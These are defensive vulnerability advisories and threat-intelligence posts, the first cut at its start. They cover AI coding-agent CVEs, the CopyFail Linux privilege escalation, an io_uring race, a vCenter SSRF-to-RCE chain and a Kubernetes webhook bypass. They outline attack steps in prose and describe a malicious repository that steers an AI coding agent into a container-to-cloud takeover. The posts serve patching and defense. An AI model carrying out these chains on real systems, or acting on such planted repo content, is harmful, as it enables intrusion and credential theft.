Patch order and structural fixes. Four CVEs landed in a single short window, all targeting the runtime stack AI coding agents depend on: npm install, the LangChain Python tool, Docker sandboxes with cloud credentials, and the GGUF model loader. None of these chains are commodity criminal infrastructure yet. The patching window is open. Patch on a normal change-management cadence; don't get caught two months from now when the npm chain inevitably gets repackaged into a stealer family. ###### Why these four are a single story Each CVE on its own is normal patch-Tuesday work. Together they cover every layer of how an AI coding agent does its job: dependency install, tool execution, model loading, and the container runtime that wraps everything else. If you run AI coding agents in production, you have at least two of these layers active simultaneously. The chain risk is real — a malicious GitHub repository (which the agent will helpfully clone) can plant package.json postinstall hooks, prompt-injection payloads, and crafted dev-container configs in the same payload. One repo, four levers. - CVE-2026-12091 — npm registry compromise. Five widely-installed packages, 38M weekly downloads, postinstall hooks exfiltrating env vars and SSH keys. CVSS 8.8. - CVE-2026-34040 — Docker auth-plugin bypass. The published exploitation path turns a Cursor-class AI coding agent into a cloud-takeover tool. CVSS 8.8. - CVE-2026-7733 — LangChain PythonREPLTool sandbox escape via __import__. Any LangChain agent exposed to user input is now an RCE. CVSS 9.6. - CVE-2026-5760 — SGLang RCE via malicious GGUF model file. Trust boundary moves from "downloaded binary" to "downloaded weights." CVSS 9.8. > The agent threat model that was theoretical two years ago is now operational. Each CVE is normal infrastructure work; the cluster is the news. ###### 1. CVE-2026-12091 — npm postinstall (CVSS 8.8) The most boring of the four, and that's exactly why it's first. 
Five compromised packages, 38M weekly downloads combined. Every developer running npm install against a corrupted lockfile gets credential exfiltration. Zero attacker effort post-publish. The maintainer 2FA bypass is now patched, but the bad versions remain in the registry's history and in lockfiles people haven't refreshed. - Refresh package-lock.json against current versions across every repository that touches the affected packages. - Audit postinstall and preinstall scripts for any path under ~/.ssh, ~/.aws, ~/.npmrc, or any token store. Most packages have neither hook; the ones that do are the high-value audit set. - Pin transitively for AI-agent workspaces — never let an agent run npm install against unpinned dependencies. Run agents against a pre-built workspace where possible. - Rebuild base images if you ship containers. Old base images with the bad versions are still poisoned. ###### 2. CVE-2026-34040 — Docker auth bypass and AI-agent confused deputy (CVSS 8.8) The most novel. The underlying bug is an incomplete fix for CVE-2024-41110 — Docker authorization plugins make their allow/deny decision on incomplete request data. The published exploitation path is what makes this 2026-specific: a malicious GitHub repository tricks an AI coding agent in a Docker-based sandbox into executing the bypass, then pivots from the container into the cloud account and Kubernetes clusters the agent can reach. - Upgrade Docker to the patched release immediately. The bypass works against any host using authorization plugins. - Remove cloud credentials from AI-agent sandboxes by default. Use short-lived, scope-narrowed tokens issued per-task, not long-lived admin credentials mounted at container start. This is the structural fix; the Docker patch is the tactical one. - Replace shared Docker for agents operating on untrusted repositories — Firecracker microVMs, gVisor, or per-task Kubernetes pods with their own IAM principal. 
Shared Docker is no longer a security boundary for untrusted code. - Audit recent agent activity for cloud-API calls, kubeconfig reads, or Docker socket access that don't match a legitimate user task. Any of these is evidence of a confused-deputy attempt, regardless of patch state. ###### 3. CVE-2026-7733 — LangChain PythonREPL escape (CVSS 9.6) A missing check in PythonREPLTool lets a prompt-controlled __import__ call break the documented sandbox. Any LangChain agent that exposes the Python REPL tool to user input is an RCE; the sandbox boundary doesn't hold. - Upgrade LangChain to a version newer than 0.2.26. Versions 0.1.x through 0.2.26 are affected. - Audit your agents for PythonREPLTool usage. If it's there and the agent takes user input from any source, the agent is RCE-capable until patched. - Treat the REPL tool as an unconditionally-untrusted code-execution endpoint regardless of patch state. Run it in a separate isolation domain — microVM or container with no network egress and no credential mounts — not in-process. ###### 4. CVE-2026-5760 — SGLang malicious GGUF (CVSS 9.8) A crafted GGUF model file causes RCE on the inference server. CVSS is the highest of the four, but the deployment surface is narrowest — only orgs running SGLang inference servers, and only when they ingest models from untrusted sources. - Upgrade SGLang to the patched release. - Treat downloaded weights as untrusted binary input. Sandbox the model loader. Don't run inference servers as root or with credential mounts. - Isolate per-request if you accept user-uploaded models. Run the loader behind a strict input filter and consider a microVM boundary per request. ###### What "patching window is open" actually means These four chains are not yet showing up in commodity criminal infrastructure — no exploit-kit packaging, no broker-pricing line items, no observable trade volume in the ordinary criminal-market data. 
That's the normal pattern for research-grade chains: weeks-to-months of pre-commoditization, and some never make it because they require too much per-victim setup. CVE-2026-7733 and CVE-2026-5760 may stay research-grade indefinitely; CVE-2026-12091 is the most likely to be repackaged into commodity stealer infrastructure because the work is already done — the postinstall script is the implant. The window is meaningful because it lets you patch on a normal change-management cadence rather than an emergency one. Patch this week. Get isolation in place this month. Don't get caught two months from now when the npm chain shows up downstream in an info-stealer family that has done nothing other than swap the implant. ###### What this isn't This isn't an "AI is dangerous" essay. It is the observation that the AI-agent stack now has its first round of CVEs that target the way agents actually work — running attacker-controlled code, processing attacker-controlled inputs, holding privileged credentials. Each individual CVE is normal infrastructure work; the cluster is the news. Patch accordingly. --- # CopyFail crossed onto a carding forum in seven days. Here's why that matters. URL: https://keepsecure.io/hub/copyfail-time-to-criminalization-seven-days Published: 2026-04-29 Tags: threat intelligence, Linux LPE, dark web, criminal markets, CVE-2026-31431, patch prioritization CVE-2026-31431 was disclosed on April 22. By April 30 it was an active thread on a carding forum's Exploits section. The seven-day crossing tells you which Linux LPE class the criminal market actually buys. CVE-2026-31431 — codenamed Copy Fail — was disclosed on April 22, 2026. Eight days later, on April 30, it was an active thread on the Exploits section of a long-running carding forum, posted by an established forum member alongside cracked Cobalt Strike binaries and similar commodity offensive tooling. 
Seven-to-eight days from researcher disclosure to criminal-forum chatter is fast — and the speed itself is the defensible insight. The criminal market made its judgment about CopyFail before most enterprise patch cycles will have started. It picked correctly. Defenders should take that judgment seriously and prioritize accordingly. ###### What we observed - April 22, 2026 — CVE-2026-31431 disclosed by Xint.io and Theori. CVSS 7.8, Linux kernel local privilege escalation via the algif_aead in-place AEAD optimization. 732-byte Python exploit, four-byte page-cache write, cross-container. Affects every Linux distribution shipped since August 2017. - April 30, 2026 — A thread titled [0-Day] CVE-2026-31431 – CopyFail: Linux Local Privilege Escalation appears on the Exploits section of an established carding forum. Posted by a forum member with prior activity on the same site (social-engineering threads, other tooling discussion). The thread sits in the same section as cracked Cobalt Strike and similar commodity criminal tooling, not in a research-mirror or news-aggregator section. > The forum's organization is the signal. The thread is in "Exploits" alongside commodity criminal tooling, not in "News" alongside research summaries. That's an opinion the forum is expressing about how the bug will be used. ###### Why CopyFail crossed and Cursor didn't Earlier this month a comprehensive dark-web sweep across the AI-IDE threat surface — nineteen Cursor IDE CVEs disclosed over eight months, multiple GlassWorm-class extension supply-chain compromises, the OpenVSX registry flaws — returned a clean negative. No criminal-market interest, no broker pricing, no observable trade volume. Same pipeline, same engines, same baseline databases. CopyFail is the same age as the latest Cursor CVEs — disclosed in the same month — and it crossed in a week. The difference isn't pipeline coverage. It's bug economics: - Reusable primitive vs research-grade chain. 
CopyFail is a four-byte arbitrary write into the page cache that works deterministically across every modern Linux distribution. It composes with literally any other foothold — webshell, container compromise, low-privilege CI runner, malicious dependency that achieved code execution. The Cursor bugs require the victim to be running Cursor, against a specific repository, in a specific configuration. One is a building block; the other is a niche. - Cross-container blast radius. The page cache is shared across containers on the same host. Criminal tooling targets Kubernetes nodes, shared CI runners, container-as-a-service platforms — exactly the multi-tenant environments where this primitive is most valuable. Cursor is a developer endpoint. The criminal market doesn't run a developer-endpoint-targeting business. - Ransomware operator demand. Linux LPE is a recurring shopping-list item for ransomware operators who need to escalate from initial-access foothold to host-level encryption authority. CopyFail fits the role exactly. Cursor exploits don't fit any operator's workflow that exists today. - Reliability properties. The published exploit needs no kernel offset leak and no race condition. That makes it weaponizable by operators who don't have the engineering depth to handle exploits with environment-dependent reliability. Lowering the operator skill floor is what drives commoditization. ###### Time-to-criminalization as a patch-prioritization signal Most security teams patch by CVSS, sometimes by CISA KEV, occasionally by a hunch about exploit prevalence. None of those reflect what the criminal market is actually doing. CVSS 7.8 vs CVSS 9.8 doesn't tell you whether a bug will be in a stealer family in three months. KEV tells you the bug is already exploited in the wild — useful, but late.
Time-to-criminalization is an earlier signal: it shows you which research disclosures the criminal market is choosing to invest in, before the in-the-wild exploitation builds enough volume to land on KEV. The framework is simple: - Crossed within days — criminal market sees commodity value. Patch on emergency cadence regardless of CVSS. Expect downstream incorporation into stealer / loader / ransomware tooling within weeks. - Crossed within months — niche or specialized value. Patch on normal cadence. Expect incorporation into specific operator workflows (initial access brokers, specific ransomware affiliates). - Hasn't crossed in a quarter — research-grade. Likely never commoditizes. Patch on routine cadence; deprioritize against bugs that have crossed. CopyFail is in the first bucket. Patch this week. The recent npm registry compromise (CVE-2026-12091) is also in the first bucket because the implant work is already done — the postinstall script is the payload. The Cursor cluster is in the third bucket and arguably never reaches the second. The patching urgency is opposite to the order CVSS would give you. ###### What the carding forum tells you about the operator playbook The forum's section structure tells you who's reading the thread and what they intend to do with the exploit. CopyFail showed up in "Exploits" alongside cracked Cobalt Strike, social-engineering walkthroughs, and commodity infostealer source code. That's the operator demographic — not nation-state, not research-grade APT, not bug-bounty hunters. Mid-tier criminal operators looking for a portable, reliable Linux LPE to bolt onto whatever initial-access mechanism they already have. The expected progression from this point, based on prior Linux LPE patterns: - Weeks 1–2 — exploit code circulates in private/paid threads. Expect a Metasploit module, a clean public PoC, or both within ten days. - Weeks 2–6 — incorporation into established malware loaders. 
The four-step exploit (open AF_ALG socket, build payload, splice into target page cache, execve setuid) is short enough to drop into a Go or Rust loader without major engineering work. - Months 1–3 — appearance in observed ransomware deployments where Linux is in the kill chain (VMware ESXi adjacent infrastructure, Linux file servers, Kubernetes nodes during lateral movement). - Months 3–6 — possible KEV listing as in-the-wild exploitation accumulates enough vendor incident-response cases to reach the threshold. This is the standard Linux page-cache LPE arc. Dirty Pipe (CVE-2022-0847) followed it. Copy Fail is structured to follow it faster because the primitive is more reliable. ###### What defenders should do this week - Patch the kernel everywhere — Amazon Linux, Debian, RHEL, SUSE, Ubuntu have advisories out as of disclosure date. Reboot or live-patch as appropriate. - Audit the AF_ALG attack surface. Most application workloads do not use the kernel cryptographic socket interface. A seccomp filter denying socket(AF_ALG, ...) closes the exploit path for that workload regardless of patch state. This is the right defense-in-depth layer for any container runtime that doesn't strictly require AF_ALG, and it survives the next page-cache LPE in the same class. - Inventory setuid binaries. Reduce the count where you can. Fewer setuid targets means fewer easy exploitation endpoints for any future page-cache write primitive — and there will be more in this class. Page-cache writes have become a recurring Linux LPE shape; treat the primitive as a category rather than a specific bug. - Treat your multi-tenant Linux hosts as the priority surface. Kubernetes nodes with mixed-trust workloads, shared CI runners, container-as-a-service platforms, bastion hosts. The cross-container property of this primitive turns an in-container compromise into a host compromise; that's the business case the carding-forum readers are evaluating. 
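The seccomp recommendation in the list above can be made concrete. A minimal sketch that builds the deny rule as a Docker-style seccomp profile fragment — AF_ALG is address family 38 on Linux, and the JSON shape follows Docker's documented seccomp-profile format, but verify the result against your runtime before deploying; the helper names are ours:

```python
import json

AF_ALG = 38  # Linux address-family constant for kernel crypto API sockets

def deny_af_alg_rule() -> dict:
    """A Docker/containerd seccomp rule that makes socket(AF_ALG, ...)
    fail with an errno while leaving every other socket() call alone."""
    return {
        "names": ["socket"],
        "action": "SCMP_ACT_ERRNO",
        "args": [
            # Match only when the first socket() argument equals AF_ALG.
            {"index": 0, "value": AF_ALG, "op": "SCMP_CMP_EQ"},
        ],
    }

def profile_with_af_alg_denied(base_profile: dict) -> dict:
    """Return a copy of an existing seccomp profile with the deny rule appended."""
    patched = dict(base_profile)
    patched["syscalls"] = list(base_profile.get("syscalls", [])) + [deny_af_alg_rule()]
    return patched
```

Serialize the result with json.dump and attach it via `docker run --security-opt seccomp=profile.json` (or the equivalent containerd/Kubernetes setting). Because the filter matches on the address-family argument rather than blocking socket() outright, workloads keep normal networking.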
###### The takeaway You can spend a lot of time speculating about which CVEs will and won't matter. The criminal market does the same exercise with money on the line, and it publishes its conclusions, in plain text, on forums you can read. CopyFail crossed in a week. That's the answer to "is this one of the serious ones." When time-to-criminalization is days, it doesn't matter what your normal patch cadence is — you have already lost the timing argument with the people building tooling against the bug. Patch. --- # CVE-2026-31431: Copy Fail — four bytes into the Linux page cache for root URL: https://keepsecure.io/hub/cve-2026-31431-copyfail-linux-page-cache-lpe Published: 2026-04-29 CVE: CVE-2026-31431 CVSS: 7.8 Product: Linux kernel — algif_aead (AF_ALG cryptographic socket) Type: Local privilege escalation via page-cache write Disclosed: 2026-04-22 Tags: Linux kernel, LPE, page cache, AF_ALG, container escape, Dirty Pipe A 2017 algif_aead in-place optimization lets an unprivileged user write four controlled bytes into the page cache of any readable file. 732-byte exploit, no race condition, every Linux distribution since 2017 — including across containers. CVE-2026-31431, codenamed Copy Fail by Xint.io and Theori, is a Linux kernel local privilege escalation rooted in a 2017 in-place optimization in the algif_aead module. An unprivileged local user can drive a four-byte write into the page cache of any file they have read access to, using a 732-byte Python exploit that requires no kernel offsets, no race condition, and works across every Linux distribution shipped since the bad commit landed. The page cache is shared across containers on the same host, so a low-privilege user inside one container can corrupt a setuid binary visible to processes on the host or in sibling containers. ###### What the bug actually is The kernel's algif_aead module exposes Authenticated Encryption with Associated Data (AEAD) operations to userspace through the AF_ALG socket family. 
In August 2017, commit 72548b093ee3 changed AEAD operations to run in-place: the destination scatterlist for the cipher's output was allowed to point at the same memory as the source. The intent was a small performance win for kernel crypto consumers. The flaw: when userspace submits an AEAD operation over AF_ALG and feeds it data via splice() from a pipe, the kernel can end up with a page-cache page in the writable destination scatterlist — a page belonging to a file the calling process does not own. The cipher then writes its output back into that page-cache page. The output is small (a few bytes of AEAD ciphertext), but it lands in the page cache of an arbitrary readable file, and from the kernel's perspective it is the most recent version of the file's contents. The patch is, almost literally, a revert: crypto: algif_aead — Revert to operating out-of-place. The 2017 optimization is removed; only the small benefit of copying associated data is preserved. ###### The exploit, in four steps - 1. Open an AF_ALG socket and bind to the cipher authencesn(hmac(sha256),cbc(aes)). - 2. Construct a payload whose AEAD output, when written into a target page, lands a controlled four-byte value at a controlled offset. - 3. Drive a write into the kernel's cached copy of /usr/bin/su (or any other readable file the attacker chooses) by routing the AEAD operation through splice() against a pipe whose pages overlap with the target file's page cache. - 4. Call execve("/usr/bin/su") — the kernel loads the corrupted page from cache, executes the injected shellcode in the suid context, and the calling user gets a root shell. Four bytes is enough. With careful selection of the target instruction in the setuid binary, the attacker doesn't need to write a full payload — they just need to flip a check or rewire a control-flow edge. The published research notes that the same primitive can be used against any setuid binary on the system, not just su. 
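Whether the AF_ALG surface in step 1 is even reachable from a given workload can be checked with a small probe — useful for verifying that a seccomp filter or image rebuild actually took effect. A minimal sketch (this only opens and closes a socket; it is not the exploit, and the function name is ours):

```python
import socket

def af_alg_reachable() -> bool:
    """Try to open an AF_ALG socket. Returns False when the platform
    (non-Linux), the kernel, or a seccomp filter blocks the call."""
    if not hasattr(socket, "AF_ALG"):
        return False  # AF_ALG is Linux-only
    try:
        s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET)
        s.close()
        return True
    except OSError:
        return False  # EPERM/EAFNOSUPPORT: the surface is closed
```

Run inside each container image class; a True from a workload that has no business using kernel crypto sockets means the deny filter discussed in the mitigation guidance isn't applied there.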
###### Why this is dangerous in 2026 specifically Three properties together make Copy Fail a near-worst-case Linux LPE: - Reliability — no race condition, no kernel offset leak required. The exploit works deterministically on first run. - Portability — the bug is in upstream code. Every distribution that backported the 2017 optimization is affected, which is essentially all of them. Amazon Linux, Debian, RHEL, SUSE, and Ubuntu have shipped advisories. - Cross-container blast radius — the page cache is a host-wide resource shared across all processes regardless of namespace. A user inside an unprivileged container can corrupt a binary visible to processes on the host. Container boundaries do not contain this primitive. > The page cache is not a per-container resource. Container isolation does not bound which files an in-container attacker can corrupt with this primitive. Researchers compare it directly to Dirty Pipe (CVE-2022-0847). The classification is fair — both are page-cache write primitives that bypass file-system permissions. Copy Fail's path is different: Dirty Pipe abused the splice/pipe-buffer flag handling; Copy Fail abuses the in-place AEAD destination scatterlist. The exploitation pattern is similar enough that the same response playbook applies. The bug also crossed onto a criminal-market exploit forum within a week of disclosure — a fast crossing for a Linux LPE, and one that should shift patch prioritization from "high CVSS" to "actively commoditizing." See the time-to-criminalization analysis for the dark-web evidence and what it implies for fleet patch ordering. ###### Who is exposed - Every Linux host shipped with a kernel containing the 2017-08 algif_aead in-place optimization — that is, essentially all production Linux distributions in active use today, on all architectures the upstream kernel supports. - Multi-tenant container hosts — Kubernetes nodes with mixed-trust workloads, shared CI runners, container-as-a-service platforms. 
The cross-container property converts a low-privilege workload compromise into host compromise. - Shared developer hosts — bastion hosts, jump boxes, classroom and lab servers, anywhere multiple users share a kernel. - Cloud workstations and devcontainers running with AF_ALG reachable to the developer's user account, which is most default configurations. The bar to exploitation is low: an attacker who has any unprivileged code-execution foothold inside a container or on a shared host. That includes a compromised CI job, a malicious devcontainer, a webshell on an application server, a lateral-movement landing pad inside a Kubernetes pod. ###### Mitigation Patch the kernel. The fix is upstream and the distribution advisories are out — Amazon Linux, Debian, RHEL, SUSE, Ubuntu have shipped updates as of 2026-04-22. There is no workaround that doesn't touch the kernel; the bug is structural to the in-place AEAD path. - Reboot after patching. The kernel module path is exercised at runtime. Live-patching solutions that handle algif_aead are an option for fleets that cannot reboot, but verify your live-patch vendor explicitly covers this CVE before relying on it. - Block AF_ALG at the seccomp layer for workloads that don't need it — most application workloads do not touch the kernel cryptographic socket interface. A seccomp filter denying socket(AF_ALG, ...) closes the exploit surface for that workload without touching the kernel. This is the right defense-in-depth layer for any container runtime that doesn't strictly require AF_ALG. - Audit setuid binary inventories. Reduce the count where you can. Fewer setuid targets means fewer easy exploitation endpoints for any future page-cache write primitive. 
- Hunt for post-exploitation on hosts you cannot patch immediately: page-cache corruption leaves no on-disk trace, but the resulting root shell does — look for unexpected execve of setuid binaries followed by elevated activity that doesn't match a user's normal session pattern. ###### The broader pattern Page-cache write primitives have become a recurring Linux LPE shape. Dirty Pipe in 2022 made the primitive concrete. Copy Fail in 2026 is the second high-quality entry in the same class, in a different subsystem, from a completely unrelated 2017 optimization commit. The lesson is that any code path that produces a writable scatterlist from userspace input is a candidate for the same bug class. Future audits of splice(), vmsplice(), AF_ALG, and any other userspace → kernel-buffer interface should specifically look for in-place destination paths that can intersect the page cache. Copy Fail is unlikely to be the last entry. The Linux LPE backlog continues to grow alongside this. CVE-2026-2091 (io_uring race LPE) earlier this year was a different primitive — a race in IORING_REGISTER_FILES_UPDATE — but the same defensive lesson holds: if a userspace-reachable kernel surface isn't load-bearing for your workload, lock it down at the seccomp boundary. Copy Fail makes the case for AF_ALG; the io_uring CVE made the same case for io_uring. Production Linux fleets should default to a deny-list-by-default posture for every kernel surface that isn't explicitly load-bearing. 
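One concrete follow-through on the setuid-inventory recommendation above: the inventory itself is a few lines of stdlib Python. A minimal sketch — the directory list you pass in is your own choice, and a fleet version would ship results to whatever inventory store you already run:

```python
import os
import stat
from pathlib import Path

def find_setuid_binaries(roots: list[str]) -> list[str]:
    """Walk the given directories and return every file with the setuid
    or setgid bit set -- each one is a candidate target for a page-cache
    write primitive in the CopyFail class."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                p = Path(dirpath, name)
                try:
                    mode = p.stat().st_mode
                except OSError:
                    continue  # vanished or unreadable: skip
                if mode & (stat.S_ISUID | stat.S_ISGID):
                    hits.append(str(p))
    return sorted(hits)
```

A typical invocation is find_setuid_binaries(["/usr/bin", "/usr/sbin", "/bin"]); diffing the output over time also catches an attacker adding a new setuid binary post-exploitation.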
--- # CVE-2026-2091: io_uring race turns any local user into root URL: https://keepsecure.io/hub/cve-2026-2091-linux-io-uring-race-lpe Published: 2026-04-24 CVE: CVE-2026-2091 CVSS: 7.8 Product: Linux kernel (io_uring subsystem) Type: Local privilege escalation (TOCTOU race) Disclosed: 2026-04-16 Tags: Linux, kernel, io_uring, local privilege escalation, race condition, use-after-free A TOCTOU race in the Linux io_uring fixed-file-table cleanup path lets any unprivileged user trigger a use-after-free on the task credentials struct, leading to root. Working PoC public. CVSS 7.8. Patched in 6.8.9, 6.7.11, 6.6.28 LTS. CVE-2026-2091 is a time-of-check / time-of-use race in the Linux kernel's io_uring fixed-file-table registration path. An unprivileged local user can race io_uring_register(IORING_REGISTER_FILES_UPDATE) against ring-teardown to trigger a use-after-free on struct cred, then reuse the freed slot to gain effective UID 0. A working PoC has been public on Full Disclosure since April 19 and is weaponized in several container-escape toolkits. ###### Why io_uring is the worst place for this io_uring is the fastest I/O surface in modern Linux and is therefore enabled by default in every mainstream distro since 5.1. Container runtimes leave it reachable inside containers unless it is explicitly seccomp-filtered. The fixed-file-table model — the exact surface this CVE hits — is a performance optimization that lets long-lived rings pre-register file descriptors, which means many workloads keep rings open across privilege boundaries. Combine pre-registered tables with the race, and you get an exploit primitive that: - Does not require CAP_SYS_ADMIN or any capability at all. - Runs from inside a default Docker or containerd container. - Escapes to host root if the container runs with the host kernel (i.e. everywhere except gVisor / Kata). - Leaves minimal forensic trace — the race success rate is ~30%, so logs show "weird syscall sequence" not "obvious exploit."
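Whether a given host has already restricted this surface is visible in a single sysctl, kernel.io_uring_disabled (available from 6.6). A minimal sketch that reads and interprets it — the value semantics follow the upstream sysctl documentation; the helper names and verdict strings are ours:

```python
from pathlib import Path

SYSCTL = Path("/proc/sys/kernel/io_uring_disabled")

def classify_io_uring_posture(value: int) -> str:
    """Map kernel.io_uring_disabled to an exposure verdict.
    Upstream semantics: 0 = enabled for everyone, 1 = creation
    restricted to privileged processes, 2 = disabled entirely."""
    return {
        0: "exposed: io_uring available to all processes",
        1: "restricted: unprivileged processes cannot create rings",
        2: "disabled: io_uring creation denied for everyone",
    }.get(value, f"unknown sysctl value {value!r}")

def host_posture() -> str:
    """Read the live sysctl on this host, if present."""
    if not SYSCTL.exists():
        return "sysctl missing: kernel predates io_uring_disabled (pre-6.6)"
    return classify_io_uring_posture(int(SYSCTL.read_text().strip()))
```

Fleet-wide, running host_posture() across your nodes tells you which hosts still need either the kernel patch or the sysctl lockdown described in the mitigation guidance.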
> This is the fourth io_uring LPE since 2022. The subsystem is not going away, and the sharp edges are not going away with it. Treat io_uring as a dangerous kernel surface and seccomp-filter it wherever the workload doesn't need it. ###### Who is exposed - Any Linux host running kernel 6.1 LTS through unpatched 6.8. The LTS cutoff is important — 5.15 LTS is not affected. - Container workloads using default seccomp profiles (Docker's default profile and Kubernetes' RuntimeDefault seccomp profile both still allow the io_uring_* syscalls). - Multi-tenant CI runners (GitHub Actions self-hosted, GitLab runner, Buildkite agents) — attacker PRs can run the PoC and root the runner host. - Shared Linux hosts (universities, bastion hosts, shell-access shared-hosting). ###### Mitigation Upgrade the kernel. Patched versions: - Mainline: 6.8.9 or later. - 6.7 branch: 6.7.11. - 6.6 LTS: 6.6.28. - 6.1 LTS: 6.1.85. If you can't reboot immediately, the cheapest mitigation is disabling io_uring entirely via sysctl: - sysctl -w kernel.io_uring_disabled=2 (requires kernel 6.6+). Set in /etc/sysctl.d/ to persist. - For container hosts, add io_uring_setup and io_uring_register to the seccomp deny list. - The artifact folder includes a Falco rule that alerts on IORING_REGISTER_FILES_UPDATE calls from unprivileged PIDs — decent catch-rate for the public PoC. ###### The broader pattern io_uring LPEs are now routine. The kernel team has been patching them quarterly since 2022. If you're not explicitly getting performance from io_uring in a given workload, disable it. The default-on posture made sense for 5.15-era systems that didn't have kernel.io_uring_disabled; it no longer does. Production Linux fleets should treat io_uring the way they treat eBPF — a feature worth having, but locked down to the workloads that actually need it. The same lesson applies more broadly.
Linux kept adding LPE entries through 2026 — CVE-2026-31431 (CopyFail) in April was a different primitive (a four-byte page-cache write through algif_aead), but the same defensive posture catches both: deny-by-default for any kernel surface that isn't load-bearing for the workload. AF_ALG, io_uring, eBPF, user namespaces — none of them belongs unconditionally enabled in containers running untrusted code.

---

# CVE-2026-34567: Unauthenticated vCenter RCE via SSRF-to-JMX chain

URL: https://keepsecure.io/hub/cve-2026-34567-vmware-vcenter-unauth-rce-ssrf-chain
Published: 2026-04-24
CVE: CVE-2026-34567
CVSS: 9.6
Product: VMware vCenter Server 7.x and 8.x
Type: Unauthenticated RCE (SSRF → JMX deserialization)
Disclosed: 2026-04-21
Tags: VMware, vCenter, SSRF, JMX, deserialization, unauthenticated RCE, ransomware target

A pre-auth SSRF in vCenter's vROps plugin lets an attacker reach the internal ActiveMQ JMX broker and trigger deserialization RCE as the vpxd service account. CVSS 9.6. Patched in 8.0 U3c and 7.0 U3r. Exploitation observed in the wild.

CVE-2026-34567 is a pre-authentication SSRF in vCenter's vRealize Operations plugin servlet (/ui/vropspluginui/rest/services/updateova) that reaches the internal ActiveMQ JMX broker listening on 127.0.0.1:61616. The broker accepts serialized Java objects; a crafted ActiveMQ message triggers deserialization RCE as the vpxd service account — the account that runs the entire vCenter management plane. The exploit is unauthenticated, network-reachable from anywhere vCenter's HTTPS port (443) is exposed, and chains two bugs the vendor had tracked separately for years.

###### Why this is a ransomware-grade exposure

vCenter is the control plane for every ESXi hypervisor in the environment. Code execution as vpxd means direct access to the hypervisor API, which in turn means direct access to every VM disk. Ransomware operators have spent two years building tooling around vCenter compromise (ESXiArgs, Royal, Akira families).
This CVE is the next link in that chain — a pre-auth RCE against vCenter is the kind of bug that turns a regional outage into a nation-scale event.

The exploit shape:

- Step 1: POST to /ui/vropspluginui/rest/services/updateova with a repoUrl parameter pointing at an attacker-controlled server. The servlet fetches the URL without validation.
- Step 2: The attacker replies with a 302 redirect to tcp://127.0.0.1:61616/. The underlying Apache HttpClient follows the redirect into the JMX broker.
- Step 3: The attacker-supplied body contains a serialized ActiveMQ ConsumerControl with a gadget chain. The broker deserializes it. RCE as vpxd.

> Pre-auth RCE on a ransomware operator's favorite target is a Tuesday-evening patch. No maintenance-window argument applies here.

###### Who is exposed

- Every vCenter from 7.0 through 8.0 U3b. The vulnerable servlet ships enabled by default.
- Internet-facing vCenter (Shodan shows ~2,100 instances with /ui/ reachable). Patch today, not Friday.
- Internal-only vCenter — still exposed to any attacker with a foothold on any VLAN that can reach port 443. Treat it as a post-compromise amplifier; still urgent.
- vCenter running the vROps plugin — the plugin is installed by default; even if you don't use vROps, the plugin servlet is still active.

###### Mitigation

Apply the patch. Fixed versions:

- vCenter 8.0 U3c (build 23765000 or later).
- vCenter 7.0 U3r (build 23820000 or later).

Between patch download and maintenance window, mitigate with:

- Block /ui/vropspluginui/ at the ingress layer — an upstream reverse proxy, F5 iRule, or NGINX location block returning 403. This disables the vulnerable servlet without touching vCenter.
- Firewall TCP/61616 on the vCenter host to loopback only (it should be already, but verify — misconfiguration has been observed in customer deployments).
- Run CVE-2026-34567-check.sh — included in the artifact folder — to confirm the vROps plugin version and flag vulnerable installs.
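The NGINX variant of that ingress block is a one-stanza change — a sketch, assuming vCenter is already fronted by an NGINX reverse proxy (the servlet path comes from this advisory):

```nginx
# Inside the existing server {} block that proxies to vCenter:
# refuse the vulnerable vROps plugin servlet outright.
location /ui/vropspluginui/ {
    return 403;
}
```

If you do use vROps integrations, confirm they don't traverse this path before enforcing; otherwise there is little reason to remove the rule even after patching.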
###### The broader pattern

vCenter CVEs in the past five years: CVE-2021-21972 (vROps SSRF→RCE), CVE-2023-34048 (DCE/RPC OOB), CVE-2024-37079, CVE-2024-38812, and now CVE-2026-34567. Each one has the same shape — internet-reachable management plane, Java deserialization chain, unauth or near-unauth RCE. If you're still running vCenter with HTTPS exposed to the internet, you have made a strategic bet that the next one of these will not be zero-day at disclosure. That bet has already failed several times.

---

# CVE-2026-40815: Kubernetes admission-webhook bypass hands over cluster-admin

URL: https://keepsecure.io/hub/cve-2026-40815-kubernetes-admission-webhook-privesc
Published: 2026-04-24
CVE: CVE-2026-40815
CVSS: 9.0
Product: Kubernetes (kube-apiserver)
Type: Privilege escalation via webhook forgery
Disclosed: 2026-04-19
Tags: Kubernetes, admission controller, privilege escalation, cluster-admin, cloud-native, RBAC bypass

A bug in kube-apiserver's webhook resolution lets a low-privilege user register a MutatingWebhookConfiguration that forges admission responses, bypassing RBAC and yielding cluster-admin. CVSS 9.0. Patched in 1.29.14, 1.30.10, and 1.31.6.

CVE-2026-40815 is a logic bug in how kube-apiserver resolves mutating admission webhooks. A user with permission to create a single MutatingWebhookConfiguration — a permission often granted to service operators who nominally have "no cluster-admin" — can register a webhook whose rules intercept requests destined for privileged resources, then forge admission responses that instruct the API server to apply attacker-controlled patches. The net result: any user who can create webhooks can achieve cluster-admin within a single API request.

###### Why this bypasses RBAC

Kubernetes RBAC gates who can perform a request, not what the admission pipeline does with it. The admission chain was designed to validate and optionally mutate incoming objects — not to authorize changes to other objects.
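For orientation, the vehicle being abused is the ordinary AdmissionReview response: a mutating webhook answers the API server with an allowed verdict plus an optional base64-encoded JSONPatch. A schematic sketch (placeholder uid; the patch value is a stand-in for a real base64 string):

```json
{
  "apiVersion": "admission.k8s.io/v1",
  "kind": "AdmissionReview",
  "response": {
    "uid": "<uid copied from the incoming request>",
    "allowed": true,
    "patchType": "JSONPatch",
    "patch": "<base64 of a JSONPatch array such as [{\"op\": \"add\", \"path\": \"...\", \"value\": \"...\"}]>"
  }
}
```

The API server merges that patch server-side after RBAC has already evaluated the original request — which is the property the forged responses described here turn into a privilege-escalation primitive.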
The vulnerable code path lets a crafted webhook response inject a patches block that the API server applies after RBAC evaluation, meaning the original caller's permissions are irrelevant. The attacker-created webhook effectively runs as the API server.

The canonical exploit chain:

- A low-privilege user creates a MutatingWebhookConfiguration matching rbac.authorization.k8s.io/v1 resources.
- Any cluster event (including ones the user cannot normally see) triggers the webhook.
- The webhook responds with a patch that creates a ClusterRoleBinding granting the attacker cluster-admin.
- RBAC never sees the patch as an independent request — it is merged server-side as part of the original request's admission.

